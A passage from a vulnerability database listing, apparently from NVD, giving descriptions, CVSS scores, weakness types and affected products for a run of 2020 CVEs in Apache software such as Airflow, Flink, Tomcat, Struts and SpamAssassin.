nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache shiro *
CVE-2020-17511 MEDIUM

In Airflow versions prior to 1.10.13, when creating a user using airflow CLI, the password gets logged in plain text in the Log table in Airflow Metadatase. Same happened when creating a Connection with a password field.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-312,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17513 MEDIUM

In Apache Airflow versions prior to 1.10.13, the Charts and Query View of the old (Flask-admin based) UI were vulnerable for SSRF attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17514 MEDIUM

Apache Fineract prior to 1.5.0 disables HTTPS hostname verification in ProcessorHelper in the configureClient method. Under typical deployments, a man in the middle attack could be successful.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache fineract *
CVE-2020-17515 MEDIUM

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions prior to 1.10.13. This is same as CVE-2020-13944 but the implemented fix in Airflow 1.10.13 did not fix the issue completely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17516 MEDIUM

Apache Cassandra versions 2.1.0 to 2.1.22, 2.2.0 to 2.2.19, 3.0.0 to 3.0.23, and 3.11.0 to 3.11.9, when using 'dc' or 'rack' internode_encryption setting, allows both encrypted and unencrypted internode connections. A misconfigured node or a malicious user can use the unencrypted connection despite not being in the same rack or dc, and bypass mutual TLS requirement.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-290,CWE-290,

Products Affected

Vendor Product Version
apache cassandra *
CVE-2020-17517 MEDIUM

The S3 buckets and keys in a secure Apache Ozone Cluster must be inaccessible to anonymous access by default. The current security vulnerability allows access to keys and buckets through a curl command or an unauthenticated HTTP request. This enables unauthorized access to buckets and keys thereby exposing data to anonymous clients or users. This affected Apache Ozone prior to the 1.1.0 release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-285,CWE-306,

Products Affected

Vendor Product Version
apache ozone *
CVE-2020-17518 MEDIUM

Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-23,CWE-22,

Products Affected

Vendor Product Version
apache flink *
CVE-2020-17519 MEDIUM

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-552,CWE-552,

Products Affected

Vendor Product Version
apache flink *
CVE-2020-17520 MEDIUM

In the Pulsar manager 0.1.0 version, malicious users will be able to bypass pulsar-manager's admin, permission verification mechanism by constructing special URLs, thereby accessing any HTTP API.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache pulsar_manager 0.1.0
CVE-2020-17521 LOW

Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
apache groovy 4.0.0
oracle ilearning 6.2
oracle communications_services_gatekeeper 6.1
oracle communications_brm_-_elastic_charging_engine 12.0.0.3
oracle agile_engineering_data_management 6.2.1.0
oracle communications_services_gatekeeper 6.0
oracle retail_bulk_data_integration 15.0.3.0
oracle retail_bulk_data_integration 16.0.3.0
oracle primavera_gateway *
oracle primavera_unifier 16.2
oracle retail_merchandising_system 16.0.3
oracle jd_edwards_enterpriseone_orchestrator 9.2.6.0
oracle agile_plm 9.3.3
apache groovy *
oracle retail_store_inventory_management 16.0.3.5
oracle agile_plm 9.3.6
oracle primavera_unifier *
oracle hospitality_opera_5 5.6
oracle retail_store_inventory_management 14.1.3.10
oracle communications_brm_-_elastic_charging_engine 11.3.0.9.0
oracle primavera_unifier 20.12
oracle insurance_policy_administration *
oracle communications_services_gatekeeper 7.0
oracle communications_diameter_signaling_router 8.4.0.0
oracle agile_plm_mcad_connector 3.6
oracle primavera_unifier 18.8
netapp snapcenter -
oracle primavera_unifier 16.1
apache atlas 2.1.0
oracle business_process_management_suite 12.2.1.4.0
oracle communications_evolved_communications_application_server 7.1
oracle primavera_unifier 19.12
oracle healthcare_data_repository 7.0.2
oracle ilearning 6.3
oracle retail_store_inventory_management 15.0.3.5
oracle agile_plm_mcad_connector 3.4
CVE-2020-17522 MEDIUM

When ORT (now via atstccfg) generates ip_allow.config files in Apache Traffic Control 3.0.0 to 3.1.0 and 4.0.0 to 4.1.0, those files include permissions that allow bad actors to push arbitrary content into and remove arbitrary content from CDN cache servers. Additionally, these permissions are potentially extended to IP addresses outside the desired range, resulting in them being granted to clients possibly outside the CDN arcitechture.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2020-17523 HIGH

Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache shiro *
CVE-2020-17525 MEDIUM

Subversion's mod_authz_svn module will crash if the server is using in-repository authz rules with the AuthzSVNReposRelativeAccessFile option and a client sends a request for a non-existing repository URL. This can lead to disruption for users of the service. This issue was fixed in mod_dav_svn+mod_authz_svn servers 1.14.1 and mod_dav_svn+mod_authz_svn servers 1.10.7

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache subversion *
CVE-2020-17526 LOW

Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.7 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N 3.1 4.0

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache airflow *
CVE-2020-17527 MEDIUM

While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack 17.1
oracle workload_manager 18c
apache tomcat 10.0.0
debian debian_linux 10.0
apache tomcat 9.0.35-3.57.3
apache tomcat 9.0.38
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle mysql_enterprise_monitor *
apache tomcat 9.0.39
oracle blockchain_platform *
oracle instantis_enterprisetrack 17.3
netapp oncommand_system_manager *
oracle communications_cloud_native_core_binding_support_function 1.10.0
oracle communications_cloud_native_core_policy 1.14.0
debian debian_linux 9.0
oracle workload_manager 19c
oracle sd-wan_edge 9.0
apache tomcat 9.0.35-3.39.1
apache tomcat 9.0.36
apache tomcat 9.0.0
netapp element_plug-in -
oracle instantis_enterprisetrack 17.2
apache tomcat 9.0.37
CVE-2020-17528 MEDIUM

Out-of-bounds Write vulnerability in TCP stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows attacker to corrupt memory by supplying arbitrary urgent data pointer offsets within TCP packets including beyond the length of the packet.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache nuttx 10.0.0
apache nuttx *
CVE-2020-17529 MEDIUM

Out-of-bounds Write vulnerability in TCP Stack of Apache NuttX (incubating) versions up to and including 9.1.0 and 10.0.0 allows attacker to corrupt memory by supplying and invalid fragmentation offset value specified in the IP header. This is only impacts builds with both CONFIG_EXPERIMENTAL and CONFIG_NET_TCP_REASSEMBLY build flags enabled.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,CWE-787,

Products Affected

Vendor Product Version
apache nuttx 10.0.0
apache nuttx *
CVE-2020-17530 HIGH

Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-917,CWE-917,

Products Affected

Vendor Product Version
apache struts *
oracle mysql_enterprise_monitor 8.0.23
oracle communications_policy_management 12.5.0
oracle communications_diameter_intelligence_hub 8.0.0
oracle communications_diameter_intelligence_hub 8.2.0
oracle financial_services_data_integration_hub 8.0.6
oracle business_intelligence 12.2.1.4.0
oracle financial_services_data_integration_hub 8.0.3
oracle communications_pricing_design_center 12.0.0.3.0
oracle hospitality_opera_5 5.6
oracle communications_diameter_intelligence_hub 8.2.3
oracle business_intelligence 12.2.1.3.0
oracle communications_diameter_intelligence_hub 8.1.0
CVE-2020-17531 HIGH

A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2020-17532 MEDIUM

When handler-router component is enabled in servicecomb-java-chassis, authenticated user may inject some data and cause arbitrary code execution. The problem happens in versions between 2.0.0 ~ 2.1.3 and fixed in Apache ServiceComb-Java-Chassis 2.1.5

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-502,

Products Affected

Vendor Product Version
apache java_chassis *
CVE-2020-17533 MEDIUM

Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H 2.8 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-252,CWE-252,

Products Affected

Vendor Product Version
apache accumulo *
apache accumulo 2.0.0
CVE-2020-17534 MEDIUM

There exists a race condition between the deletion of the temporary file and the creation of the temporary directory in `webkit` subproject of HTML/Java API version 1.7. A similar vulnerability has recently been disclosed in other Java projects and the fix in HTML/Java API version 1.7.1 follows theirs: To avoid local privilege escalation version 1.7.1 creates the temporary directory atomically without dealing with the temporary file: https://github.com/apache/netbeans-html4j/commit/fa70e507e5555e1adb4f6518479fc408a7abd0e6

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache html/java_api 1.7
CVE-2020-1925 MEDIUM

Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class which reads a URL from the Location header, and then sends a GET or DELETE request to this URL. It may allow to implement a SSRF attack. If an attacker tricks a client to connect to a malicious server, the server can make the client call any URL including internal resources which are not directly accessible by the attacker.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache olingo *
CVE-2020-1926 MEDIUM

Apache Hive cookie signature verification used a non constant time comparison which is known to be vulnerable to timing attacks. This could allow recovery of another users cookie signature. The issue was addressed in Apache Hive 2.3.8

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-208,CWE-203,

Products Affected

Vendor Product Version
apache hive *
CVE-2020-1927 MEDIUM

In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,CWE-601,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
opensuse leap 15.1
broadcom brocade_fabric_operating_system -
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle communications_session_report_manager 8.2.1
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
oracle communications_element_manager 8.2.1
oracle zfs_storage_appliance_kit 8.8
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
netapp oncommand_unified_manager_core_package -
debian debian_linux 9.0
oracle sd-wan_aware 8.2
oracle communications_session_report_manager 8.1.1
oracle communications_element_manager 8.2.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
CVE-2020-1928 MEDIUM

An information disclosure vulnerability was found in Apache NiFi 1.10.0. The sensitive parameter parser would log parsed values for debugging purposes. This would expose literal values entered in a sensitive property when no parameter was present.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache nifi 1.10.0
CVE-2020-1929 MEDIUM

The Apache Beam MongoDB connector in versions 2.10.0 to 2.16.0 has an option to disable SSL trust verification. However this configuration is not respected and the certificate verification disables trust verification in every case. This exclusion also gets registered globally which disables trust checking for any code running in the same JVM.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache beam *
CVE-2020-1930 HIGH

A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious rule configuration (.cf) files can be configured to run system commands similar to CVE-2018-11805. With this bug unpatched, exploits can be injected in a number of scenarios including the same privileges as spamd is run which may be elevated though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or 3rd party .cf files from trusted places. If you cannot upgrade, do not use 3rd party rulesets, do not use sa-compile and do not run spamd as an account with elevated privileges.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
CVE-2020-1931 HIGH

A command execution issue was found in Apache SpamAssassin prior to 3.4.3. Carefully crafted nefarious Configuration (.cf) files can be configured to run system commands similar to CVE-2018-11805. This issue is less stealthy and attempts to exploit the issue will throw warnings. Thanks to Damian Lukowski at credativ for reporting the issue ethically. With this bug unpatched, exploits can be injected in a number of scenarios though doing so remotely is difficult. In addition to upgrading to SA 3.4.4, we again recommend that users should only use update channels or 3rd party .cf files from trusted places.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache spamassassin *
CVE-2020-1932 MEDIUM

An information disclosure issue was found in Apache Superset 0.34.0, 0.34.1, 0.35.0, and 0.35.1. Authenticated Apache Superset users are able to retrieve other users' information, including hashed passwords, by accessing an unused and undocumented API endpoint on Apache Superset.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset 0.35.1
apache superset 0.34.1
apache superset 0.35.0
apache superset 0.34.0
CVE-2020-1933 MEDIUM

A XSS vulnerability was found in Apache NiFi 1.0.0 to 1.10.0. Malicious scripts could be injected to the UI through action by an unaware authenticated user in Firefox. Did not appear to occur in other browsers.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi *
CVE-2020-1934 MEDIUM

In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-908,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
canonical ubuntu_linux 18.04
oracle communications_session_route_manager 8.1.1
debian debian_linux 9.0
opensuse leap 15.1
oracle communications_session_report_manager 8.1.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle communications_element_manager 8.2.0
oracle communications_session_report_manager 8.2.1
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
canonical ubuntu_linux 16.04
fedoraproject fedora 31
canonical ubuntu_linux 20.04
oracle communications_element_manager 8.2.1
oracle zfs_storage_appliance_kit 8.8
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
CVE-2020-1935 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle agile_product_lifecycle_management 9.3.6
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 12.2.0.1
apache tomcat *
oracle communications_element_manager 8.1.1
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle mysql_enterprise_monitor *
oracle communications_element_manager 8.2.1
oracle hospitality_guest_access 4.2.0
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
oracle retail_order_broker 15.0
oracle agile_product_lifecycle_management 9.3.3
oracle siebel_ui_framework *
oracle hyperion_infrastructure_technology 11.1.2.4
debian debian_linux 9.0
oracle workload_manager 19c
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
canonical ubuntu_linux 16.04
apache tomcat 9.0.0
oracle agile_product_lifecycle_management 9.3.5
CVE-2020-1936 MEDIUM

A cross-site scripting issue was found in Apache Ambari Views. This was addressed in Apache Ambari 2.7.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache ambari *
CVE-2020-1937 MEDIUM

Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache kylin 3.0.0
apache kylin *
CVE-2020-1938 HIGH

When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 12.2.0.1
apache tomcat *
fedoraproject fedora 32
oracle communications_element_manager 8.1.1
oracle agile_plm 9.3.3
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle agile_plm 9.3.5
blackberry workspaces_server 8.1.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
apache geode 1.12.0
oracle communications_element_manager 8.2.1
oracle hospitality_guest_access 4.2.0
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
blackberry workspaces_server 7.1.2
oracle siebel_ui_framework *
debian debian_linux 9.0
blackberry good_control *
oracle workload_manager 19c
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
blackberry workspaces_server 9.0
fedoraproject fedora 31
fedoraproject fedora 30
blackberry workspaces_server 7.0.1
CVE-2020-1939 MEDIUM

The Apache NuttX (Incubating) project provides an optional separate "apps" repository which contains various optional components and example programs. One of these, ftpd, had a NULL pointer dereference bug. The NuttX RTOS itself is not affected. Users of the optional apps repository are affected only if they have enabled ftpd. Versions 6.15 to 8.2 are affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache nuttx *
CVE-2020-1940 MEDIUM

The optional initial password change and password expiration features present in Apache Jackrabbit Oak 1.2.0 to 1.22.0 are prone to a sensitive information disclosure vulnerability. The code mandates the changed password to be passed as an additional attribute to the credentials object but does not remove it upon processing during the first phase of the authentication. In combination with additional, independent authentication mechanisms, this may lead to the new password being disclosed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-212,

Products Affected

Vendor Product Version
apache jackrabbit_oak *
CVE-2020-1941 MEDIUM

